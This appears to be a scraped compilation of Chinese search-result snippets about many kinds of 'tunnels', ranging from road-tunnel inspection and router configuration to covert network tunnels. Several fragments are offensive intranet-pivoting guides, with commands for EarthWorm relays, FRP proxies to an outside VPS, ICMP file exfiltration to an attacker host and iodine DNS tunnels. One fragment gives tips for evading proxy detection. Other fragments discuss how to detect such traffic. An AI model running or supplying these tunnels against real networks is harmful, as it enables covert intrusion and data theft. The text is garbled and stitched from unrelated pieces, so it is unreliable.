隧道检测的重要性隧道病害检测极其重要,它直接关系到交通安全、运营效率、经济效益和社会的稳定运行。保障交通安全是最重要的,隧道是一个封闭、受限的交通空间,一旦发生结构安全事故,影响巨大。 隧道检测可确保隧道结构长期稳定与耐久性,为科学决策和智能运维提供数据支撑。 为提高隧道检测效率和准确性,51camera经过多次验证结合机器视觉先进技术推出了隧道病害检测系统,它是基于多目高速视觉的隧道表面图像的采集、处理与异常状态智能识别系统。 该系统多种巡检模式:1.低速便携式(0-10公里/小时)2.中速自行走式(0-30公里/小时)3.高速车载式(0-100公里/小时)智能检测病害:成功实现了裂缝、渗漏水、脱落、设备异常状态等多种病害的智能检测 3、系统软件——成像效果 下列图像为地铁隧道成像效果节选,其中测试模块为单激光模块,测试距离2米,测试速度50公里,光圈F5.6,曝光时间25us。图片隧道病害检测是至关重要的。
2.1 DNS隧道攻击实现流程 大多数防火墙和入侵检测设备对DNS流量是放行的。 而隧道攻击正式利用了放行的特点以及协议解析流程来实现的。 并且依托DNS协议的特性,该木马可以有效穿透防火墙,躲避常规的安全检测。 以此来躲避检测 早在2012的RSA会议上,基于DNS协议的远程控制恶意软件就被视为未来六种最危险的攻击之一。 dns2tcp (图 2-3) Dns2tcp的客户端命令如图2-3所示。 三、检测DNS隧道木马 将通过3个通信行为分析DNS隧道木马会话。 1DNS会话中数据包的总数 正常DNS会话比较简短,随着一次DNS解析任务结束而结束。
实验目标 通过配置SBFD检测SR-BE隧道,来提升网络可靠性。 组网需求 如图所示,公网PE之间SR-BE隧道,为了提升网络可靠性,需要部署SBFD特性。 当SBFD检测到SR-BE隧道故障时,可以可触发VPN FRR等应用在主隧道故障时进行快速流量切换,以减少对业务的影响。 ? 配置思路 骨干网上配置IS-IS实现PE之间的互通。 PE之间配置SBFD,检测SR-BE隧道。 第六步:在PE1上使用Ping检测SR LSP连通性 ? 在PE设备上执行display segment-routing seamless-bfd tunnel session prefix ip-address命令,可以看到Segment Routing隧道的
隧道代理在绕过限制和保护隐私方面发挥着重要作用,但随之而来的是被目标网站检测和封禁的风险。如何有效地防止隧道代理被检测和封禁成为许多用户关心的问题。 一、选择高质量的隧道代理服务商 1.避免公共代理:尽量选择经过验证和可信赖的隧道代理服务商,避免使用公共代理,因为这些代理往往容易被目标网站检测到并封禁。 3.搭配其他反检测技术:结合其他隐私保护技术如浏览器指纹隐身或验证码识别等,提高隧道代理的使用效果和安全性。 2.多代理轮换:使用多个不同的隧道代理服务商,按需切换代理,减少单一服务商被检测的风险。 使用隧道代理时,防止被检测和封禁是至关重要的。 通过选择高质量的隧道代理服务商,合理配置请求参数,运用隧道代理的使用技巧,以及动态调整策略,你可以更有效地防止隧道代理被检测,保护自己的访问权益和数据安全。
ICMP隧道检测与防护 在真实环境中,ICMP协议经常会被用来检测网络连通状态,而防火墙是会默认允许ICMP协议通信,因此越来越多的攻击者会利用ICMP协议进行非法通信,通过ICMP协议搭建隐蔽隧道加密恶意流量 2.DNS隧道流量检测与防护DNS隧道是一种隐蔽隧道,通过将数据或命令封装到DNS协议进行数据、命令等传输的隧道,其利用原理为防火墙针对DNS报文不会进行拦截阻断,而且目前的杀毒软件、入侵检测防护等安全策略很少对 载荷分析是根据正常的DNS域名满足 zipf定律,而DNS隧道的域名遵循的是随机分布这一原则去检测主机名,将超过52个字符的DNS请求作为识别DNS隧道的特征,流量监测则是检测网络中的DNS流量变化情况 ,通过检测单位时间内DNS报文流速率来检测是否存在DNS隧道。 3)记录DNS查询日志,通过频率、长度、类型监控异常日志。3. HTTP隧道流量检测与防护HTTP隧道是一种颇具安全威胁的数据传输手段。
×××隧道技术,通过一个公用网络(通常是因特网)建立一个临时的、安全的连接,是一条穿过混乱的公用网络的安全、稳定的隧道. 有基于二层(pptp/l2tp/l2f)和三层(gre/ipsec)的×××隧道技术 今天在H3C防火墙上利用三层的gre协议,实现总公司和分公司的通信。 【实验设备】 H3C防火墙两台(模拟总/分公司的出口路由器) H3C三层交换机(模拟Internet网络环境) 测试PC两台(总、分公司内网主机) 【配置过程】 Step1:进入三层交换机,划分两个 Step2:分别进入两台H3C防火墙的Eth0/0,配以地址,作为总、分公司的网关参数。 Step3:分别进入两台H3C防火墙的Eth0/4,配以公网IP地址,作为内网访问Inetnet的出口。 Step4:在两台防火墙上分别创建隧道接口,隧道协议选择gre。
前言 监控隧道内的车道堵塞情况、隧道内的车祸现场,在隧道中显示当前车祸位置并在隧道口给与提示等等功能都是非常有必要的。 这个隧道 Demo 的主要内容包括:照明、风机、车道指示灯、交通信号灯、情报板、消防、火灾报警、车行横洞、风向仪、微波车检、隧道紧急逃生出口的控制以及事故模拟等等。 效果图 ? 代码实现 场景搭建 整个隧道都是基于 3D 场景上绘制的,先来看看怎么搭建 3D 场景: dm = new ht.DataModel();//数据容器 g3d = new ht.graph3d.Graph3dView ') === 'models/隧道/摄像头.json' || data.s('shape3d') === 'models/隧道/横洞.json' || data.s('shape3d') === 'models ', false);//设置隧道“地面”不可选中 } else if (data.s('shape3d') === 'models/隧道/排风.json') { data.s
图片 本质上来说,检测隧道HTTP代理的可用性就是检测HTTP代理的可用性,目前市面上常见的方法有如下几种: 一、常用软件 利用常用的日用软件当中的“设置”,使用HTTP代理,填写对应ip代理的地址+端口 ,点击“检测”,返回成功,则是正常,返回失败,这是无效。 四、访问浏览器 直接设置HTTP代理,利用该HTTP代理是否能成功访问网站来检测是否连接代理成功。 HTTP代理数量较少的时候可以使用curl 检测,当面临隧道代理这种,数量层级较大的时候,就需要用脚本测试了,测试的同时,我们把可以读取包含代理的文本文件,并将可用的代理写入另一个文件中,具体如下: import , 'r') as f: proxy_list = f.read().splitlines() # 创建用于保存可用代理的列表 valid_proxies = [] # 遍历代理列表,检测代理是否可用
目录 前言 一、概述 1、简介 2、原理 3、使用 (1)服务端 (2)客户端 二、实践 1、场景 2、建立隧道 (1)攻击机监听 (2)目标机发送 (3)攻击机转换 3、抓包看看 三、探索 1、源码与分析 (1)icmp_tran.py (2)tran.sh 2、检测与绕过 (1)异常ICMP数据包数量 (2)异常ICMP包长度 (3)payload内容 结语 前言 用Python编写,将文件base64编码后,通过ICMP包传输 条件: 目标机可以ping出去 目标机管理员权限 2、原理 ICMP隧道原理参见:内网渗透系列:内网隧道之ICMP隧道 3、使用 (1) sudo python icmp_tran.py test.zip 192.168.10.128 (3)攻击机转换 收到文件 进行转换 成功得到zip文件 3、抓包看看 可以看到都是 "[+] tranmistted.txt created" cat transmitted.txt |base64 -d >>test echo "[+] file test created" 2、检测与绕过
常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。 ,可以跨平台使用,为了避免隧道被滥用,可以为隧道设置密码。 ,以Web服务器182.168.188.134为ICMP隧道跳板进行传送 相关参数说明: -p:指定ICMP隧道另一端的IP -lp:指定本地监听的端口 -da:指定要转发的目标机器的IP -dp TCP通信数据包,这在内网中有时候也会很有帮助,且该工具具有一定的免杀效果~ 工具使用 首先去Github下载项目: https://github.com/T3rry7f/ICMPTunnel 之后在拿到权限的边界服务器端禁用 使用ICMP隧道时会产生大量的ICMP数据包,我们可以通过Wireshark进行ICMP数据包分析,以检测恶意ICMP流量,具体方法如下: 检测同一来源的ICMP数据包的数量,一个正常的ping命令每秒最多发送两个数据包
内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。 该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,现在使用人数较多,如果在真实环境下使用,需要免杀 下载地址:https://github.com/idlefire/ew 3. 多级级联 工具中自带的三条端口转发指令, 它们的参数格式分别为: $ ./ew -s lcx_listen -l 1080 -e 8888 $ . :10.10.21.2 172.16.5.2 财务核心机器:172.16.5.5 正向SOCKS v5服务器 以下命令使用目标为其拥有一个外网IP地址的情况: 在内网web服务器与外网代理机器之间架设隧道 只能访问内网资源,无法访问外网 域控 在代理机器,内网域控,内网web服务器上进行模拟: 先在代理机器上执行: ew -s lcx_listen -l 1080 -e 888 即在公网代理机器中添加转接隧道
——FRP隧道 域控不能直接连接外网vps,可以连接内网web服务器,内网web服务器可以直接连接vps,所以通过内网web服务器作为跳板,进行二级代理。 首先在外网vps上启动frps服务,在内网的web服务器与域控之间建立一条frps隧道,内网web服务器启动frps,域控启动frpc服务,相互连接,建立起一条一级代理隧道,此时web服务器就作为跳板了 ,此时再在web服务器上打开frpc服务,与外网vps进行隧道建立,此时二级代理完成,可直接访问到域控 外网VPS上 frps.ini: [common] bind_addr = 0.0.0.0 server_port = 7000 [http_proxy] type = tcp remote_port = 1080 plugin = socks5 然后执行:frpc.exe -c frpc.ini 然后对隧道连接是否成功进行检测 web都动不动就崩溃,更别说支持3389 ptunnel环境在内网多限制情况不可利用,局限性大 DNS隧道穿透,适合僵尸网络
该隧道由中间的“代理服务器”创建,通常部署于“DMZ”区域。 在隧道中可以传输一些被限制的协议,最终借由“代理服务器”跳出受限网络。 /1.1 200告诉“客户端”隧道已经建立 “客户端”发送TCP之上(包括SSL)的数据给“代理”,再经由“代理”转发给“服务器”。 # 以下来自服务器的数据 HTTP/1.1 200 OK ... ---- 非CONNECT方法建立HTTP隧道 建立HTTP隧道可以是任何方法,它只是一种思想,而CONNECT是最为常见的方式而已 建立HTTP隧道的场景中,“客户端”部署在保护(受限)网络的内部,而“代理”则部署在外部。 ---- 代理认证 这里的“代理认证“指的是”代理“对”客户端“进行身份认证,认证通过后才允许建立HTTP隧道。
,ICMP隧道是将流量封装进 ping 数据包中,旨在利用 ping数据穿透防火墙的检测。 本文将为大家介绍一种简单而有效的icmp隧道检测技术。我们将利用Spark Streaming,来帮助我们检测ICMP隧道。 因此,根据正常ping和ICMP隧道产生的数据包的特点,可以通过以下几点特征检测ICMP隧道: 检测同一来源数据包的数量。 正常ping每秒只会发送2个数据包,而ICMP隧道可以每秒发送很多个; 检测数据包中 payload 的大小。 六、总结 本文介绍了基于统计的检测ICMP隧道方法和落地实施中的一些技术细节。
本文简单介绍一个在现有只允许打开某些网站的情况下,建立SSH隧道,把SSH隧道再塞进HTTP流里面去。示意图大致如下: ? 检测不到里面的数据,这些行为监控之类的代理设备就形同虚设了。
随着dns隧道应用的越来越广泛,尤其是xshell事件被公布以后,各大公司纷纷启动对dns隧道的监控,参考xshell的逻辑,大多数公司采取了“监控多个终端请求异常长度域名”的检测方案,其中注重检出率的公司为了提高检出率 但落地成本高,复杂度也高,对于一般公司来说很难实施,为此笔者从dns隧道的原理和黑客的思路入手分析,提出一些简单的检测方案,仅供参考! ,本次实验不涉及): 单台机器检测: 域名长度(3+N级的域名) * 域名数量(相同只计算一个) > 单台机器阈值,评测外传数据大小,达到阈值则触发报警 群体事件检测: A机器域名长度(3 3、检测逻辑匹配分析: a) 外传域名超长 b) 频率较高 c) 类型为TXT,有回包 d) 无A记录解析结果,也就无程序对结果发起访问 e) 不存在全域名注册记录 3、检测逻辑匹配分析: a) 因实验未将结果外传,所以域名长度不大,如dns隧道外传则必使用长域名 b) 因实验未将结果外传,所以频率不高,且只获取远端的get-server功能,频率也不高
网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel) 目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道 (Icmptunnel) ICMP隧道 ICMP隧道简单实用,是一个比较特殊的协议。 在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到 使用ICMP搭建隧道(PingTunnel) PingTunnel是一款常用的ICMP隧道工具,可以跨平台使用,为了避免隧道被滥用,还可以为隧道设置密码。 隧道是指将TCP连接通过ICMP包进行隧道传送的一种方法。
VXLAN头格式[1] VXLAN报文的封装/解封装是由位于隧道两端的VTEP负责完成。源端VTEP在对一段报文进行VXLAN封装之后,通过隧道向目的端VTEP发送封装报文。 如图 3所示,为了实现虚拟网络内部虚拟机之间的相互通信,首先所有相关的VTEP需要通过IGMP协议加入多播组(239.0.0.1)。 ? 图 3. 采用NVGRE封装的数据包头格式 4.STT STT(Stateless Transport Tunneling),无状态传输隧道技术,是在数据中心2层/3层物理网络上创建2层虚拟网络的又一种Overlay 5)Max Segment Size:隧道端点在网络上发送数据时需要采用的TCP MSS大小。 STT分片格式 5.总结 通过上面的介绍,我们可以发现为了构建覆盖网络,我们需要将虚拟网络的数据通过隧道传输。而为了构建隧道,我们需要对原有的载荷数据包进行封装。
应用层隧道技术之使用DNS搭建隧道(iodine) 目录 iodine 使用iodin搭建隧道 (1):部署域名解析 (2):安装并启动服务端 (3):安装并启动客户端 (4):使用DNS隧道 ➩iodine iodine是基于C语言开发的,分为服务端和客户端。 ) 支持多种DNS记录类型 提供了丰富的隧道质量检测措施 ➪使用iodin搭建隧道 1):部署域名解析 首先,用一台公网的Linux系统的VPS作为C&C服务器,并准备好一个可以配置的域名(这里我们假设是 如下,表示设置成功 服务端启动成功后,VPS上多了一块dns0的网卡,ip为我们设置的192.168.100.1 (3):安装并启动客户端 Windows系统 如果是Windows系统,直接执行下面命令启动客户端 /IcmpTunnel) 内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道 内网转发及隐蔽隧道 | 使用SSH做端口转发以及反向隧道 内网转发及隐蔽隧道 | 端口转发和端口映射 内网转发及隐蔽隧道
ICMP隧道小记 一般的通信协议里,如果两台设备之间需要进行通信,肯定是需要开放端口的,但是ICMP协议不需要。 apt-get install python-impacket 如果出现下图的情况,更新一下服务器中的包即可 如果还是不可以的话,就只能用pip了 pip2 install impacket step 3 sysctl -w net.ipv4.icmp_echo_ignore_all=1 隧道利用完记得换回来1改成0就好 step 4 Run .